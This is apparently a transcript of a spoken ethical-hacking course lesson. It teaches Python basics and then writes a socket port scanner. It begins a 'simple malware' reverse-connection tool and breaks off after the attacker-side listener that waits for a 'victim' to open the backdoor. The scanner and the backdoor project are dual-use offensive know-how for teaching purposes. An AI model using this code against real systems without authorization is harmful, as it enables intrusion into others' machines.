In this section, we wanted to have a basic understanding of what is going on within the Python programming language, but we don't want to write programs, of course, because this is not a Python course, but we just want to have a scripting knowledge or a scripting capabilities with us in order to do our simple tasks, which are really important in a lot of places. So when you are doing red teaming or penetration testing, when you are solving CTFs or you are doing bug bounties, you really need a scripting language. So Python is really hacker friendly, and as an ethical hacker, you should know as much as possible about Python, or as much as Python as possible. So Python is by default installed on Kali Linux. So if we do python -V, you see the version of Python by default might be 2.7 or 3.9 or something like that, but it really depends on your default Python execution in your environment. So if I do which Python, you see it says user bin Python, and if I get ll on that, you see it says it is referencing Python 2. So which Python 2, it says user bin Python 2, and again, if you do that, it's Python 2.7, and you can continue this on ongoing, and if we do ll on that, you see user bin Python 2.7 is where all that goes. So if I do Python, so you know Python 2 is deprecated and people are on Python 3. So if we do Python 3-v, of course, it will be Python 3.9.1 plus, and that's the latest available Python version for now. So if you want to run Python on Mac OS 6, Windows, or even Linux, you can go to the python.org, of course, go to the downloads, and get the latest version. Oh, it is 3.9.2, so I'm one version before. But anyway, you can download whatever version you want. So 3.9.2, go to the bottom, the files, and you see the source, the Mac OS 6 version or installer, Windows installer. But as you see, there is no specific Linux version because Linux operating systems are really Python friendly, and you can install it by sudo apt install. So install Python 3, for example, and you see all the packages of Python version 3. So it is already the newest version because sudo apt update, and then if I do install Python 3, I can get the newest version available. So I just wanted to announce that we will have a Python course in the near future with security in mind. So we will write a lot of great programs in there and teach you Python from scratch. But anyways, we are here to practice as much as possible and be ready for the rest of the course. So let's continue on Python 3 and see the console. So you can even run test.py like this with Python command, or if you run it without any parameters, you will be inside the console of Python. So we are inside the console. I can do print. So the first thing that everyone does when they want to learn programming languages or scripting languages is printing hello world. So hello world, and that's printed. But print is a function, is a built-in function within Python, which will print whatever parameters you pass to it. So hello world, students, for example, as our next string in here. So you see hello world students. We could add new line, to our print statement. You see it's gonna be like that. Or we can say print this and is equal to this. So you see there will be no new line for entering the next command in here because of this. So we will learn about all that, but anyway, let's continue. So with Control D you can get out of this console and then you can get back in. So we have math operators, and these are, as the name comes out, the operators that will do some calculations for us. So for example, 2 with the power of 3 will be 8, because 2 is times 2 is times 2, and it is called exponent. So we have remainder, for example 8, remainder 2, or let's say 3 would be 2, because if we divide 8 to 3, there will be a remaining of 2 at the end. We have this, which is integer division. We have the division itself, 8 divided by 4. We have multiplication, 100 times 2, or 3 minus 1, for example, 2 plus 1. These are simple operations inside Python. So let's continue with data types. So we have integers inside Python. So for example, you can say -2, or you can say 4, 0, whatever you enter, these are integers. We have floating numbers, for example, -1.25, or we have 9. Let's say 10. So all these are floating point numbers. We have strings, for example, A. We can have a longer string, for example, welcome to this course, please enroll. So that's another string in here, which I really like. So let's continue. We can have concatenation with the strings. So learning Python is just by doing it. So don't go for books or videos that will explain Python hundreds of hours to you. So just open the console, start to program, or open VS Code, write something, and you will learn as you are doing Python. So that's the way I learned myself. So alert everyone. This is a string concatenation. So you see they are concatenated. We can times a string into a number. So alert times 100. You see 100 alerts. We can have a lot of other things in here. So we have variables. And variables are places that you can store things. So for example, you do sum for 100 plus this number, and you want to save it somewhere, of course, because you need it. And then you say, okay, sum, and it says the sum of those two numbers were this. You could also run sum like this. The console of Python will print this for us. And variable names can only start with alphabets, numbers, and also underscores. So for example, you can say underscore is equal to, this is a fantastic variable name. And then you can say print this for me, you see. But you cannot, for example, store in, let's say, star is equal to A's. It's wrong. Or you cannot start with, let's say, space in your name. You see, it's wrong. You should delete the space. So these are some simple rules. We have comments, so you can comment a line with this. This is a comment. Nothing happens. It's a comment. So we can print, for example, I love you, my dear students, and that's a reality. I really like you. I haven't seen you ever, but yeah, because we are working on something, we are teaching each other something in this course, and that's the reason. But I can do comments at the end of this line. So comments with instructions, for example. So see, I love you, my dear students, but this line, yeah, this part is not effective. So let's print this. You see, print is the basic function, and it is really useful in some places that you doubt what happened to the data. What is going on in here? You can use print. So it can get multiple items, as you saw. So for example, you can get another string in here, or any numbers, stuff like that. So all that will be printed. So we have the input function, which is also important. For example, you can say my name is equal to input. So the input function will print something, prompt the user, and store its inputs inside, yeah, the variable you say. So enter your name. So it says enter your name, and I say, hey, my name is, for example, teacher. So if you print my name right now, and it's Python 3, you should put it inside parentheses. So you see, you can print either like this or like this. Doesn't make any difference. But the best practice is to do it like this. So you see, teacher is, printed in here. So we have input from user. We can have input like this from the users. So you can reserve spaces for, let's say, any variable inside the print statement. So enter your name. I'm Michael. That's it. Print my name inside parentheses. So you can say print like this. My name was this dot format. For example, yeah, the variable name, my name. So my name was Michael. So you put some space in here. After the double quote, you say dot format this, and yeah, your variable in here will be put in here. You can have multiple of these. What you should say. So you can have multiple of these placeholders, but you can say my name again. So you see, with any number of these, you should have format in here. But there's a better format also to use. Print. So you should put F in here. It says it's a formatted text, so it will consider variables. So my name was, and you specify the variable in here. It will be processed. So my name was this, and again, my name was this. So you see, Michael is, yeah, reflected in here. So we can have the length of the strings. So len, my name, it says 7, because yeah, Michael is 7 characters. So you can have a list. List is the first data structure inside Python. So lists are like this. You can have strings, a, let's say, ABC, some integers, some other integers, some variable, my name, for example. So a is equal to all that. So if you print a, you see a, ABC, this number, 10, and Michael. So lists are really great. You can say len of a, and it says 5. 1, 2, 3, 4, 5. And you can say, for example, a conditional statement, if a, print the list is not empty. So you see, it says if a is not empty, print the list is not empty. But if a is equal to nothing, so print a or a. Let's run this again. You see, print a statement is not happening because a is empty. And we can have other types of comparisons, which we will get into. But also we have str function, which says, okay, str of 29, it says, okay, I convert this integer for you to a string. So str will do data type conversion for you. You can also have int. So see str. Everything in Python is objects and classes. So even these, yeah, converters. But anyway, you can say a is equal to 545. So print a, or let's say a. But if we do int of a, it will print only 540 because it's a float and it's an integer in here. So we have flow control operators. For example, if, let's say, this string a is equal to this string a, do what? Print they were equal. That's it. So they were equal. So what really happened was a is equal to a. This statement will be true. And if this is true, print this. That's what really happens inside Python. You can say is 40 equal to 42. It says false. 1 is equal to 1. True. So a is equal to 1. It is true because if you print a, it is 1. So a is equal to 2. Run that again, it will be false. So these are comparison operators. You can say not equal to. It is true because a is 2 and it is not equal to 1. So a is less than 2. It is false. Is it less than 1? Again false. 3. It is true. So we have bigger than, less than or equal. So bigger than and equal to. So bigger than and equal to, it is true. And we have less than equal, which works like this. So let's continue. So is dog not equal to cat? True. So we have Boolean evaluation. For example, true. Is it equal to true? It is true. Is it equal to false? False. It is not equal to. So not equal to false, it is true. So false, it is case sensitive. Is it not equal to false? It is false. Or is it equal to false? It is true. So you see some simple comparisons and Boolean evaluations. So A is equal to true. And then we can say if A is true, for example, print something. Print true. So you see true is printed because A is true. You can say this in some other words. If A is not false. So you see it's really simple. Python is super simple, but at the same time super powerful. So see it is again the same meaning. You can also say if A. That's also the same meaning in here. So print true, and that's it. So all that is also for false. We can have Boolean operators like and or. So true and true, it is true. With false, it is false because it is and. But if we have or, so you see true or true is also true. We can have true or false, which will be true again because it's or. False or true again. So all that is simple. So you see or and operators work like this. So not true is false, and it's also the same for false. So we can have parentheses for our comparisons. 4 is less than 5, and it's, lowercase. So 4 is less than 5. That's true. This part will look true. Let's have another statement of true in here. 2 is bigger than 0. So it will be true. You see, it's really simple. So we have if statements. A is equal to Bob. If A is equal to Bob, having that, print it was, let's say, A. Format this. See, it was Bob. So it's Bob 2. Launch the code. You see, nothing was printed because it was not Bob. So we can have if and else statement like any other scripting language or programming language. So we can say if, let's have A is equal to Bob. If A was Bob, print, for example, Bob. Else, which means if this condition was not matched, print not Bob. Run, you see, it was Bob because if was executed. And if we say A is equal to, let's say, not Bob in here, something like that, and run the previous code, this, and then else statement. So print not Bob. So you see not Bob will be printed. So we have if else statements as conditional statements in here. We can also have elif. Elif gives us another check condition, and we can have multiple elif conditions. So first we're going to have if, and then elif, and at last else, which means if none of above was matched. So we can say A is equal to Bob, or let's say Michael. So A is equal to Michael. If A is equal to Bob, print Bob, elif a is equal to Michael. So we have a colon, yeah, in a lot of places inside Python when you want to indent and write something. So as a note, Python doesn't separate its blocks or its related code with curly braces. It does that with indentation. So whatever is indented will be related to the previous line that was not indented. So we can have also multiple indents inside of them. So every indentation will belong to its parent like this. So print Michael. So if A was Michael, print Michael, else at last, again, colon, the child, let's write the child, none of Bob or Michael. So in here, because A is equal to Michael, elif will match and will be executed. You see, Michael is printed in here. So if else and elif statements are as simple as that. So we can continue on the console, but let's launch vcode or VS Code to have our code in there. So let's save this somewhere inside temp. Let's create, make directory temp, Python, save this file inside test.py. There's an update available, don't update for now. So we say while a is less than 5. So while is one of the loop statements we can have. Oh, no Python interpreter is selected. Let's select one. I need, yeah, this one, 3.9. So while is one of the loop statements. We also have for statement for looping through some objects with some conditions. But anyway, a is equal to 0. We have while for now. While checks if this statement is true, we'll do the instructions. So we say print, let's format this string. A is now A, and then A is equal to A plus 1. So let's execute this. And see what really happens is A is now this. Run it. And see A is now 0, A is now 1. It is incremented by 1 each time, then goes up. So A is 1, is it less than 5? Yes. 2 less than, yes. So the instructions will execute. And then 4 becomes 5 with this statement in here. Checks in here, 5 is less than 5. No. So it will break out of the while loop. So that's how the while loop works. Let's, yeah, close this. We have another type of while loops which are really common, which is while true. So true is always true, and this will execute forever. We can say while true, print, enter your name, get the name inside the name parameter, and say if name is equal to Michael, then print, I got the Michael name in here, and then break out of the loop. So break is one of the statements we have or instructions we have. Break will break out of the loops. So out of the loops. Either it is for or while. So here when you do break and when execution reaches break, it immediately exits the while loop. So it will print something, what we put in here, and then break out of the while loop. So I want this to print done with while. So done with while, break happened. So you see this is a while statement which is always true, and we break this while loop with break statement. So let's run it, and it asks enter your name. So I say Bob, enter your name again. Kevin, enter your name. So when you enter Michael, if a statement happens, the print will happen, and then we will break out of the while loop, and this print statement will be executed. So enter Michael, you see I got the Michael name in here, done with the while, break happened. So you see while is really useful in a lot of programs when you want to do something over and over again, and then check for a condition, and if that condition was matched, you want to, let's say, finish that while statement. So we also have continue. So whenever continue is reached by program execution, the program execution immediately jumps back to the start of the loop. So let's see. Let's go here, cut this, continue being here, and we want to print this. No continues. If it was Michael, print will continue. So what really happens with continue is the program reaches here, it checks whether or not the name is Michael. If it was, it will print this and reaches continue, and continue says don't execute the rest of the code, just go to the while statement again. So let's see what happens. Launch Python 3, this Python file, enter your name, test, you see no continue will be executed, enter your name again, Bob, no continues. But if you say Michael, this printf statement will run and this will not. Michael, you see, will continue, and then again enter your name. So break and continue are really useful. You can use it in a lot of situations. So we have for loops. We can say for I in range, for example 5, print I for me, launch. So you see 0, 1, 2, 3, 4 is printed. We can have other ranges. For example, I can say from 0 to 100, count by 5, which means 0, 5, 10, 15, 20, and it goes like that. So let's execute it again. Launch. Launch. So you see it is incremented by 5. So we have for loops. So for example, we can say for I in 1, 2, 3, 4, 5, 6, colon, print I for me. So these are basic examples, of course. Launch, you see all the items will be printed. So this is a list, an important data type, which you can have various items inside of it. And we can also have break with for loops. So we can say if I is equal to 3, then break. So break. And before that, just print the statement for us. So launch, you see 1 and 2 is printed, but when it reaches 3, it will break out of this loop in here. So we can import modules, or let's say libraries. So for example, import requests will import the request library for you, and if you hover over it, it says requests HTTP library. Request is an HTTP library written in Python for human beings. Basic get usage is like this. So you say import request, and then we can create an object in here and say requests.get this address in here. And we can print the status code and a lot of things with it. So libraries and modules are what really makes Python very powerful. So you can say import requests and then say rec. It's a variable. It doesn't matter what you name it. Requests.get. So a function of this class or module will be called and says, okay, give me the URL to do import, for example, https python.org. So what really happens is a GET request will be sent to Python, and we want to print rec dot. So you see when you enter dot inside VS Code, you see everything within this attribute in here. So we can have, for example, headers, history, raw, reason, request, status code. So I want the status code, and it's an int. You see, if you hover over it, VS Code will guide you. So let's execute it to see what happens. Execute. A request will be sent to the python.org, and I think it's ... Let's have ... in here. Close, run it again, and you see 200 is the status code. But if we have python.org/admin, for example, this URL in here, run it. So it might say, yeah, it again says 200, but let's say admin this, run it. You see 404. Python.org has an admin page. Let's see, I'm curious. What is the admin page? Wow. Python.org administration. That's somehow a dangerous practice to have administrative pages open to the public. But yeah, that's a discovery in here. But okay, we can search for any module or library we want to use. You can say Python 3, then the name of the module, request in this example. So you can go into it, pyp.org project requests, and it says request is simple yet elegant HTTP library. And in every such pages, it will have examples for you, so you know how to use that library. Import request, and it says send a get. You can also send authentication, print the status code, get the headers, see the encoding, and see the text of the response of the web application. So in here, let's cd temp Python. So let's create nano index.html, or let's say index.txt. Nano into this, hello Python coders, for example. And we want to share this python-m, python3-m, http.server, and by default it is on port 8000. So you see we have a web server in here. Let's close this with Control D. Go to the temp Python. We have the code in here. So we want to send a request to our own web server. Let's clean also. So let us change this URL to http://127.0.0.1 port 8000 and then index.txt. And I want to print the status code. Then I want to print rec.text, which is the response body. Launch it, Python 3 test.py, and you see we get a request in here with a get on this address, HTTP protocol version 1.1, and you see the status code is 200, hello Python coders. But if I change this to index2.txt, of course, you know what happens. We are going to have the error page. The response code is 404, which means not found, and we have this default not found page. So that's modules. You can import, for example, a string module to do print, for example, let's say a string dot ASCII lowercase, for example. Print a string dot ASCII uppercase. Launch. So you see lowercase characters, uppercase characters. And how we do find these libraries? By searching inside Google. So for example, how to send post requests Python 3. So you search for whatever you want, either on W3 Schools or Stack Overflow or anywhere else. You find the module names that should be used. So in here it says import requests. Put a URL, put some objects like this. This is a dictionary we will talk about. And then it says send request.post with URL and data is equal to my object in here. And then print the text. So we can exit our program with the help of a module called sys. So import sys, which has a lot of items inside of it. So if you say, for example, sys dot, you will see all the methods available with this class. So I will define classes and also functions to see, for you to see how easy classes and objects are. So as you know, Python is object-oriented programming language, and we will have an object-oriented small program, so you see how it works. It is really easy. So sys has multiple functions, which in classes we call them methods. But anyway, let's see how we can exit programs with the help of sys. So while true, and always running statement, print, so type exit to exit. And then instructions is equal to input. So if instructions is equal to exit, so if instructions is equal to exit, sys.exit, and you can also specify, exit status. You see it defaults to 0, which means success, like this. But you can enter, you can enter whatever number you want, which means the program execution was not successful. So let's exit 1 and run it to see what happens. Type exit, type exit. You see the loop just repeats itself. And if you enter exit, you see the program exits. So whenever the execution reaches here, it will exit the whole program altogether. So we have functions. You can define functions for your Python scripts. So functions are modular instructions, so you don't repeat yourself. For example, you can have multiple modules. One module can take the input, one can check the status or something else. One module can do the loop, and another module can print something and stuff like that. So let's have def get input. And function and variable definitions are either you stick the two words together, but the second word and the next ones should be with capital cases, or you put lowercase and then you put underscore in between. So that's how we name everything in Python. So def get input, and then you have a colon. You say input or inputs is equal to input. Please enter your name. And functions either execute something and they finish by themselves, or return some results. So return inputs to wherever it was called. This is our first function. Def, let's have checker. Checker gets a name, so you can define the variable name in here. So as opposed to many programming languages, Python doesn't care about the data type, or doesn't need that you define, for example, this is a string, just like, for example, Java or C++. So it's really simple to program in. Python, you also don't have this. We just indent and we're okay. So def checker, it checks a name. If name is equal to, again, Michael, do what? Call a function which is called printer. It's a function name with the name. Else, if anything else was in there, do what? Nothing. So pass will do nothing for you. We could also do all that, but I wanted you to see what pass does. It comes here, does nothing, and continues the execution. And then we have checker, def repeater, another function. So repeater does call inputs, or it was get input, So it calls this, and get input will return a name. So name is equal to this. And then it will call checker for the name. So we have another function called printer in here. Let's define it, def printer. Printer gets a name and prints it. As simple as that. The name is correct. We have so name as Michael, something like that. We just want to yeah, get familiar with functions, and that's it. So repeater does while true, for example, do all this for me. So it gets the name and checker is called. So it gets the name will be returned to the name function, checker is called, checker just checks if it is Michael, and if it is, it will print the name. Otherwise, let's print something. Print not Michael. Not, let's say, what we want. Something like that. So this will be repeated every time. And printer is called by checker that will print the name Michael for us. So let's execute this script in here. Nothing happens. Why? Because we didn't execute it or called repeater. So in the main function, which is down here, you call repeater. So function calls are like this. Let's run it again, and you see, please enter your name. So test, not what we want. Test 2, not what we want. Bob or Bobo, Kevin, let's say Sarah. None of them work. Nina doesn't work. So let's go with Michael. And yeah, the name is correct. We have Michael as Michael. So that's how you create functions, and you can call these functions whenever you want, and you don't have to repeat yourself, do this print statement, get the input, or check for some conditions like this. Only you call the function with the variable and everything will be handled. There is some simple notes into functions. So whatever you define inside functions are stored only on that function. So outside of that, you cannot call inputs or you cannot access inputs inside these functions. We have also global variables. Global variables are defined outside the scope of any function or class for that matter. So we can say name2 is equal to Bobo, and have another if statement in here as elif. So elif name is equal to name2. You see, we can access this global variable. If it is print, or let's call, we have a function for printing. Let's call printer with the name2 this time. Call the script. So enter your name, test, nothing, not what we have. Let's say, what was it? Bobo. You see the name is correct. We have Bobo as Michael. So you see the elif is executed in here, and we have access to the global variable. And that's how we define global variables and work with them. Okay, let's continue with the definition of none, which is nothing. So let's say a is equal to print hi. So you see print hi doesn't return anything, and for that matter a will be equal to nothing. And then I say print a. So let's see what happens. So it says hi because of this print statement, and it says none. None means it is empty. So now if I can say if a is none, print a is none. Lunch, you see a is none, which means it is empty. Let's do some exception handling. So there might be some exceptions happening to your program. You can control that with try and except. So let's def a function called nothing, which takes some number to divide. So for example, input number, some variable. It says print division is now, so we want to format some text. We want to say 43 divided by input number. So let's launch this function. Let's launch nothing of 43. Launch. It gives you 1 because 43 divided by 43 will be 1. If you change it to something like 2, launch, you see some other number comes up. What happens if you put 0? Division by 0 cannot happen based on mathematics rules. If you run, you see division by 0 happened. And we have some problems in here. The program execution might come to problem and something like that. So for this reason, programmers put try, and they say, try this line for me, and whatever happened, go with the execution flow. But if there were any problems, except, and the problem in here that I can guess would be entering a 0. So if you have an exception type called 0 division error, we define it as E, and we say print error, so error, invalid argument or number entered, and then we print the E or the exception type. Format this as string. Let's launch it this time to see what happens. You see our error is printed, so we have full control over the situation. Error, invalid argument or number entered, and the name of the exception is division by 0. But if you enter something else, for example, yeah, in here, if you enter, for example, 43, save, launch, you see program execution is just fine. So that's the beauty of try and accept. We can handle errors. And we have another instruction called finally. Finally happens regardless of try and accept. So either this executes or this one, finally will always run. So we can say finally print, this is finally statement and is always executed. Launch, you see it launches. If we also have exception, again finally will run. So you see it is always executed. So these are simple notes that will help you to learn Python as we are moving forward. So as I told you, we have lists. Lists are defined like this. For example, cat, dog, 1, 2, 3. And you can print, for example, A. Launch, you see all the list is printed. You can say, let's go to the console. So A is equal to this. You can also say the first element or the second element. The first element is 0. The last element is -1. You see 3 will be printed. You can say I want, let's say, from 0 to 1. So cat and dog. You see what happens. You can go the opposite way. Cat and dog is printed. So that's how you can play with lists. But only know this type of data is called a list, and everything can be stored inside the lists. Strings, integers, dictionaries, whatever you have. So we can also get the length of a list with the number of the variables inside of it. So we can concatenate two lists together. For example, we can say horse, elephant, let's say snake, 1, 2, 3, 4. That's B. A plus B would be this. So as simple as that, the two lists are added together and we have this one. So we can delete an element. For example, we can delete from, let's C be equal to A plus B and C 1 or 0. Let's have the 0. So this is the parameter 0, we can delete it. So if I get 0 again, you see dog is printed instead of cat. And yeah, one element is deleted from the list. So we can say for I in C, print I, and every element inside the list will be printed. We can also print at one line with some configurations inside print a statement like this. You see, everything will be printed at one line. So this is C. We can say a snake in C, it is true. So you see, as simple as that, Python will search the whole stack for you, the whole list for you. You can say 1 in C, it is true, but if I say 100 in C, it says false. It doesn't exist. So searching is real simple. Everything is simple in Python. So we have a list like this. How many variables? 11. How about A? Okay, A is fine. We can have these items separated. So animal number 1, animal number 2, num number 1 or num1, num2, num3 is equal to A. So what really happens is A is this, and if you say animal 1, you see the first one. Second one, we have num1, num2, num3. So you see the elements of A are stored inside variables. So we have C, we can find the place of something inside a list. For example, we can say C.index. So I want the index of snake, and it says it's on element number 6. So 0, 1, 2, 3, 4, 5, and 6. This is the index. So you can say C6 to see a snake. So we have tuples. They specify like this. R is equal to, it is all the same. There's only one difference. So 1, 3, whatever. You see the data is printed like this. So again, a lot of rules apply. For example, you can get the second element or something, or the third element, of course. But the difference between a list and a tuple is tuples are immutable, meaning we cannot change them. For example, you cannot say R2 is equal to, what is R2? It is 3. You cannot say, okay, make it 100. You see, tuple object does not support item assignment. That's the only difference. But with B, you can say, for example, the 5. So the last number is this. You can change it to 100. Print it again, you see it is changed. With tuples, you can't. So you can convert. For example, you can do tuple B. You see, B was a list in here, but when you call tuple, it will be changed to a tuple for you. It can work the opposite way. For example, R is a tuple. I can do list on it. You see, it's a list now. So it's all real simple, but I just want you to know about it. We have also dictionaries and structuring data. Dictionaries work like this. So dict is equal to curly braces, and we have keys and values. So keys like key number 1, and then you put colon, you put the value. So value number 1. It's comma, and then the next one. That goes on and on. So colon, value 2, so key number 2. That's it. If you say dict, you get dict, and you can say, okay, I want the value of key number 1, and you see value number 1 is printed. If you get the second key, you get the second one. So that's how dictionaries work, and dictionaries are really useful when you want to submit key value parameters to some function and stuff like that. So for example, let's go back to the V code. Let's import requests. So request module rec is equal to requests.post. So if you do a post request, it says I get a URL, I get data. Data is what really happens when you want to do post request. You see, it's a dictionary. Data is something like that. When you say, okay, I want to get login, and the request would be like username is equal to admin, password is equal to admin, something like that. So you want to post something like that with request module. You say URL is equal, URL is equal to URL, and then you say data is equal to data. So, and let's define URL and data. So URL is simple, is equal to, it should be a string, http 127.0.0.1/post, for example, or post data, something like that, whatever URL. And we have data. So data is equal to a dictionary. So that's where dictionaries will help you. If you know the usage of something, that will be much more easier to understand. That's my experience. So I want to say I have a key value called username colon, username is admin. You see how easy it is? I have another key called password. The value for it is, for example, the default password of Microsoft, something like that. And then I have another parameter says, let's say action, and it says do login. So that's my data. It will be posted to the target, and then I want to see rec.status code and also print rec.text. So that's it. Let's see what happens. I want to define a code in here. Nano this. I want to say this is a testing environment. Let's see if we can get this. So this is our web server. Let's do request to the target to see what happens. We have a syntax error. I have a comma in here. So the last one doesn't have, but every one of them. We could also put this on one line, so it doesn't make any difference, like this. But for better readability, we can do this. Python is totally okay with that. Let's launch it to see what happens. Connection refused. Oh, port is 8000. Save. Clean, run. Not implemented. So our web server is not ready to handle post requests. So for the purpose of grabbing the post request, we will launch nc listener. So sudo nc, it doesn't need sudo, nc-l vnp port 8000, listening on any interface port 8000. So we have our post request ready, launch, and you see in here, yeah, we have a post request / post data, host is this, user agent is Python requests, the version of the request module, the encoding types, and all the headers. But in here, this is very important. This is the part we created a dictionary to send, and Python just sends this as a post request or post form in here, application x form URL encoded. So you see username is equal to admin, and password is equal to password, and action is equal to do login. So that's what really happens when you know how to work with dictionaries, and they are really helpful, especially in situations like this, which you need to define key values. So we have lists, we have tuples, we have dictionaries, and also we have sets, which are unordered collections with no duplicates. So the note about sets are they are not duplicated. They are not really a lot in used, but anyway, we have them 3, 2, 3, 4, 4, 4, 4, 4, and 1, 1, 1, 1, something like that. So 1, 1. That's it. If you print s, execute, you see 1, 2, 3, 4. All the duplicates are deleted. So that's all about the sets. You can have, not repeated items or delete the duplicate ones. You can add, you can update the sets, you can do whatever you want or is available to you. So if I do s dot, I can see all the methods available within the set data type. Anyway, with the usage of Visual Studio Code, everything is in front of us, and names are really meaningful. We can see, we can pop, remove, add, clear, copy, get difference, whatever. It's really self-explanatory in here. So we had the data types, we had the conditional statements, we had loops or execution flow controls like break, continue, and all that. We had comparison statements or operators. So we had the functions, we had modules or libraries and how to use them. So that's what we learned up to here. You're going to learn by scripting, and that's the only way to learn Python. So we will write also some tiny projects in this section. So let's talk about classes, which is the only thing remained in here. The definition of the classes says, let's have word wrap. So Python classes provide all the standard features of object-oriented programming. So if you ever heard OOP, it means object-oriented programming. It means programming with the help of objects. The class inheritance mechanism allows multiple base classes to derive from a single class, or a derived class can override any methods of its base class. And yeah, a method can call the method of a base class. All that is real simple, but when you see the definition, it seems really hard. So what is a class? Class is defined as, for example, class hello colon. Of course, hello is like this, but so we have a class. It has some methods and it has some attributes. So attributes. So methods are functions and attributes are variables or data types. So with every class we have methods, we have attributes. For example, for the attributes, let's have a comment in here. Our simple hello class works like this. We can have name is equal to Michael, hair color is equal to red, so age is equal to 32. So these are the attributes of our class, and we have some methods which are simply functions. Def, just like how you define functions. So def say hello. So Michael wants to say hello to everyone. Print, we have a concept in here which is called self, and self is the object name itself. That's really weird, but because you haven't created any objects from this class, you call it self for now, but later on it will be changed to whatever name you say. So I will show you what I mean. For now, self dot, so we want to print the name. Let's do it like that. So print format, the name of the guy is self dot name, and that's the method of say hello. And also print format self dot name says hello. We have another method called stats, for example, which does print format this text, the guy's age is, so again, self dot age, and her color is, let's say, self dot hair color. So there's two methods, three attributes with this class. Let's see how we can instantiate an object from this. I hope this makes sense. There's no other simpler way for me to explain this to you. So I want to call my object created from this class, which is a version of this class. So objects are created from classes. They are versions of the class that come to reality. Let's define it like that. So object num1 is equal to hello. That's how simple you create an object inside Python. And then with the help of this object, I can call whatever method or attribute that I want. So if I put dot, you see I can call say hello, which was this method in here. I can call stats, which is the second method. I can also have three attributes that we defined: age, hair color, and name. So let's call hello. Launch. There will be an error. You see, it says it takes no positional arguments, but one was given. And what is the one? This self. So For every attribute we define inside the class and self is inside of it, you should also pass the self, which is the object name again. So let's call it again, and you see the attribute of say hello is called. The name of the guy is self.name, which is Michael, and then self.name says hello. You see Michael says hello. I can also do, for example, let's delete this. I can print object num1. Let's call an attribute. So hair color. Let's have this in curly braces. Format this print statement. The guy's hair color is this. So you see an attribute is called from that class. Launch. The guy's hair color is red. So we can pass initial variables to the classes or the objects created from the classes. We can do inheritance from this object. For example, I can create another class which inherits the attributes and also methods of this class and can add items to these. So the beauty of classes are, one of the most important ones is inheritance. You can create base classes and do inherit from the base classes and continue from that place on. So there is a lot into this. I just wanted you to see a simple class like hello class and see the attributes, the methods, how we instantiate an object, and all that items. But a lot of scripting work is done via functions. We don't need to create classes. Classes are for bigger programs when you want to have everything written in object-oriented programming. But that's it for the basics. Let's continue on some simple projects to learn more Python. Okay, let's continue and write a simple port scanner that uses the class socket or module socket. So let's save this as port, let's say port scanner.py, import socket, so the socket class or module. Also I want to, from colorama, import for, so this is for colorizing text. So let's define colors as globals or global variables. So we need a color of green for successful states, and we say for.green. As simple as that. So it is for, yeah, lowercase, .green. We need gray, which is for.light black. We need reset. So reset is for resetting the color. Otherwise, it will go with that color to the end of the program. So for.reset. These are our colors. Let's define our function that does the port scanning. So port scanner, it takes a host, it takes a port. What it does, first creates an object of class socket, or creates a socket simply. So sock is equal to socket.socket, object instantiation. So we have a try statement in here, try connecting to the, so sock.connect, and we need a tuple, so host and port is passed through this function or this method within this object, but in a tuple format. So that's the type of the data it accepts. And then we can specify the timeout, so set timeout to be 0.2 seconds, be fast. So this is the time that we will wait for that port to send us back the ACK packet. So except means if any problem happened, if there was port unreachable, destination unreachable, the port was closed, whatever happened, return false, so I know that the port was closed. And there's a syntax within try and except. You can say else. And else means if this happened successfully, of course this didn't happen, run the following for me. Return true. So basically what it says is try connecting. If you weren't successful, this. If you were successful, do this. Return this for me. So that's the port scanner function. Let's go and define runner. It's another function we have. First, it takes or gets the host. So host is equal to input. Please enter the host to a scan. So we get the host. Then we say for I, or let's say for port in range 1 through, we can go through the last port, which is 65,535, something like that. But I want to go to 1000. So for this range, do what? Do pour the scanner. So pour the scanner on the host and also on port. But I want to check if this port was open on this host. So if it was open, let's do the print job. So print, format this text for me. I want the text to be in green, which I have defined before. And for successful states, we choose this sign. The port, so port was open on this host. And then we use reset to reset the color. Else, if it was not open, print, format the text, and go gray for me, E-, which means a failed state. Port, let's say port is closed. And then I want to reset the color. And also I want something else. I don't want any new lines on failed or closed ports. So I want to say and is equal to \r to have carriage return. Instead of new line with print statement, it will go back to the same line all over again. So that's it. That's our runner. Let's call it. So if __ name is equal to __ main, which means if this function was called directly without any imports. Oh, do what? Do call runner function. Let's see what happens. So 127,001, I want to scan myself. Green is not defined. Let's see. And that's it. Run 127,001. And you see port 22 was open on this. Let's see if we can define other ports. So sudo nc lvmp port 1, port 2, port 20, port let's say 23. So I want to have some random ports, port 800, port 1000, or let's say 999, port 80, 443, 445. So a lot of open ports. If I get sudo netstat listen, you see a lot of ports open. Let's run the program again to see what happens. So let's see if localhost is accepted. It is. And you see all the open ports are detected. Port number 1, 2, all the open ports are detected. But as you see, there is no closed ports in here because of that carriage return. So if you notice in here, you will see some closed ports moving back and forth, and that's why we choose the carriage return to, yeah, you don't need to print the closed ports. And this time, only port 22 is open because all those NCs are killed. They are killed after the first initial connection to them. So that's our port scanner. You can add other modules to it. Let's say do other types of scans, or get a range of IP addresses, get a range of ports, get the help of nmap. Whatever you want to do, it is possible with your Python code. So if you are able to write something like that, which is really simple, I see it doesn't have anything inside of it. The most important part is this, the rest is just calling functions, coloring stuff, and yeah, things like that. You only needed to know how socket works and this tuple, and yeah, specify some timeout and this syntax in here, which was new. So that's it for our port scanner. We will move forward to other projects. So let's have our next project, which might seem to you some kind of a hard project, but it really is not that hard. And we want to write a client server remote administration tool. Or let's say we want to have an exe file or a Python file that runs on the victim, and we can send commands to it. It will connect to us, connect back to us, and we will have full control over it. So we want to write some kind of simple malware. So unless this is inside a testing environment, it's not that hard. You can write a simple malware yourself. So first thing, as the previous project, is importing socket. Let's also save the file. Let's call it malware.py. So import socket, attacker IP is equal to, let's have some globals. So my IP address is 10.10.06, if I'm not wrong. So attacker port is equal to, let's be 4443. So that's the IP address and port that the attacker's listener will work on. So we say server is equal to socket.socket, instantiating an object or creating an object from this class or module. And then simply we say server dot, we want to use a method inside this class, and it is called bind. It will listen for a connection on this. So attacker IP, and as you guess, attacker port. But why don't I get anything in here? Because I should go inside the tuple. So we need another pairs of parentheses in here, and then attacker IP, and then attacker port. So this is defined. Let's print something. Let's say server started. And also let's say another positive announcement, listening for victims, connections. That's it. And then you say server, please listen for me for how many connections? 1. And then I say whatever connection came, so server.accept. So you see, if you hover over it, it says wait for an incoming connection. You return a new socket representing the connection and the address of the client. For IP sockets, the IP address info is a per host address and port. So which means we get 2 returning parameters. Let's say victim and victim address is equal to this. Let's have an announcement. Print, format the text, and yeah, let's have this. So victim address opened the backdoor or malware. So another announcement in here. And then we say while true, so forever, I want to have a CMD. So CMD is equal to 